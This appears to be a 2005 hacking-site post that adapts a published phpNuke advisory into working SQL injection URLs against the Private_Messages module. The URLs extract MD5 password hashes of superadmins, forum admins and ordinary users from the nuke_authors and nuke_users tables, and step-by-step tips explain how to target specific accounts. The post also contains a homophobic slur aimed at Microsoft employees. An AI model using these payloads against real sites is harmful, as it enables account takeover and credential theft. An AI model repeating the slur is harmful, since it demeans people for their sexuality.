.....In......
--------------Modifications to waraxe-2004-SA013------------------------
(This is only changes to Waraxe's phpNuke private messages sploit not the phpbb one.)
Waraxe's proof of concept:
http://target-site/nuke/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
Shai-tan's working version:
http://target-site/nuke/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,aid,null,null,null,null,null,null,null,null,null,pwd FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Notes:
*20 Nulls on the left hand side of aid and 9 Nulls on the right hand side of aid.
=================================================================================================
(This is if the database is too big for phpNuke to backup, if you are getting a time out)
Requirements:
*For another admin's MD5 hash you need to get into the God admin's account first, Login and change the admin whose password you want, to have less than superadmin privs. Lets change to forum administration only.
http://target-site/nuke/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,aid,null,null,null,null,null,null,null,null,null,pwd FROM nuke_authors WHERE radminforum=1 LIMIT 1/*
------Changes to waraxe-2004-SA013--------
*Changed admin's privledges to forum administration only and swapped radminsuper=1 to radminforum=1
=================================================================================================
(This is of you want to gain a user's MD5 that is a user of the forum)
Requirements:
*Just change the 2 in user_id=2 to the users ID found in the members list of the site http://target-site/nuke/modules.php?name=Members_list . You'll have to add 1 to the number you get. i.e: Number 45 + 1 = ID 46. And hope like hell no users have been deleted.
*Or if you already have admin access to the site go to administration, then go to "Edit Users" and search the username you want. That will tell you the user_id.
http://target-site/nuke/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username,null,null,null,null,null,null,null,null,null,user_password FROM nuke_users WHERE user_id=2 LIMIT 1/*
-------Changes to waraxe-2004-SA013-------
*Changed aid to username, changed pwd to user_password, changed nuke_authors to nuke_users, changed radminsuper=1 to user_id=2.
=================================================================================================
I worked these out myself. Thanks to waraxe's advisory "waraxe-2004-SA013".
http://www.waraxe.us all other security places suck. (Besides the main exploit sites).
BTW: All Microsoft employees are homos (unless they use Linux at home). It's a known fact!
Need any help? email zebcarnell@gmail.com
.....Out......
Last updated on 04-06-2005 @ 02:35 pm
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 530
Members: 0
Total: 530
